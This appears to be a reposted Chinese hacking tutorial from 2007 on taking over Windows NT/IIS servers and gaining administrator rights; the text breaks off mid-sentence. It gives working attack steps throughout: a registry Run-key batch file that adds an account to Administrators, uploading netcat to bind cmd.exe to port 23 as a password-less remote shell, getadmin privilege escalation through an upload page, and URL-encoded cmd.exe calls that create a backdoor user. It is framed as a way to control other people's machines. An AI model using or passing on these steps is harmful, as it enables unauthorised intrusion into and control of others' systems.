教你获取WindowsNT的Admin权限的方法.docVIP

教你获取WindowsNT的Admin权限的方法 2007-01-15 08:58 EternalDream　 黑客基地 我要评论(0) 字号：T | T 想完全控制别人硬盘上的文件么？首先要先获取别人系统的管理员权限，怎样来做？看完文章你会有所了解。 AD：  一、通过修改注册表 凡是具有登录NT本机的用户，例如IUSR_machine，都具有对 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 项的可读可写权限，该用户可以远程访问这个项。比如，他可以创建一个bat文件，文件内容为：cmd.exe /c net localgroup administrators IUSR_machine /add，把该文件copy到winnt目录下，然后在注册表上述的项添加一个数值，指向这个文件。 那么，当下次Admin登录到该机器上时，就会自动把IUSR_machine添加到Administrators组。 另，注册表键HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以这么做。 二、自建Telnet服务在NT上执行指令 要求用户有文件上传权限，而且该目录位于web目录下，该目录允许执行，下面是具体步骤。 假设你的目录是/frankie，那么，把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去。 然后，在浏览器端输入： /frankie/cmd.e ... 20-t%20-e%20cmd.exe 这时候，你的浏览器将停止不动，实际上，Server上的Telnet的服务已经产生了。 这时，用Telnet连接的23端口。你发现，不用密码，不用登陆，对方C:\提示符已经出现在你的眼前！更妙的是，这个Telnet server是一个一次性的服务，当客户端一退出，该服务也将终止。 Netcat不同于一般的特洛伊木马，它可以构建任何的TCP连接服务。在浏览器端输入上述的字符串，等价于在NT的Dos方式下输入 nc -l -p 23 -t -e cmd.exe 这将把cmd.exe绑定到23端口上。 三、入侵NTserver典型途径V2.0 1、如果你有NT/IIS服务器的任何一个帐号，哪怕是guest帐号，都可以获得root。 2、用Netcat和iishack可以获得root。 3、Iusr_计算机名这个帐号有ftp上传，web执行等权限。 4、在Web server上执行程序是入侵NT的关键。 5、要在Web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。 在本文中，目标机器的名称是ntsvr2，目标机器的域名是，目标机器上有scripts和cgi-bin目录，scripts目录下有uploadn.asp等asp程序，可能有guest帐号，肯定有iusr_ntsvr2这个帐号。 第一个方法、用Iusr_ntsvr2后者Guest这两个帐号 这里假设我们已经破解了这个帐号的密码，在浏览器输入： /scripts/uploadn.asp guest和iusr_ntsvr2这两个帐号都可以进这个asp页面，在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录。 然后输入： /scripts/getadmin.exe?IUSR_ntsvr2 大约十多秒后屏幕显示： CGI Error 这时有90%的可能是：你已经把IUSR_ntsvr2升级为Administrator，也就是任何访问该web站的人都是管理员。 下面可以Add user： /cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add 这样就创建了一个叫china用户，密码是news，然后： /scripts/getadmin.exe?china 第二个方法、用匿名Ftp 如果允许匿名帐号ftp登陆的设定，也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server，比如:(示例名)： ftp Connected to 220 ntsvr2 Microsoft FTP Service (Version 3.0). Ntsvr2这个东西暴露了其NETbios名，那么在IIS的背